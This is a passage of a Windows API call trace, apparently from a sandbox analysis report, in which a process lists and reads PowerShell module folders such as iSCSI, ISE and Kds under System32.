1 [0177.028] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 0 [0177.028] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.028] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi\\iscsi.psd1")) returned 0x20 [0177.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.029] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0177.029] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", lpFilePart=0x0) returned 0x37 [0177.029] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.030] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.030] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1da, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psd1", cAlternateFileName="")) returned 1 [0177.030] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 1 [0177.030] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 0 [0177.030] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.039] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.039] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0177.039] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", lpFilePart=0x0) returned 0x37 [0177.039] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.039] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.039] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1da, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psd1", cAlternateFileName="")) returned 1 [0177.040] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 1 [0177.040] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.040] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.040] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0177.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.040] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0177.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.040] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0177.040] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", lpFilePart=0x0) returned 0x37 [0177.041] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.041] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.041] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1da, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psd1", cAlternateFileName="")) returned 1 [0177.041] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 1 [0177.041] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 0 [0177.041] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.042] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\ISE.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise\\ise.psd1")) returned 0x20 [0177.043] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.043] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0177.043] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", lpFilePart=0x0) returned 0x37 [0177.043] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592850 [0177.044] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.045] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0177.045] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 1 [0177.045] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 0 [0177.045] FindClose (in: hFindFile=0x1a592850 | out: hFindFile=0x1a592850) returned 1 [0177.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.045] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0177.045] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", lpFilePart=0x0) returned 0x37 [0177.046] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.046] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.046] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0177.046] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 1 [0177.046] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.047] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.047] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0177.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.047] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0177.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.047] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0177.047] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", lpFilePart=0x0) returned 0x37 [0177.047] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.047] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.048] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0177.048] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 1 [0177.048] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 0 [0177.048] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.048] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.048] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.048] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\Kds.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds\\kds.psd1")) returned 0x20 [0177.053] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.053] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0177.053] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", nBufferLength=0x105, 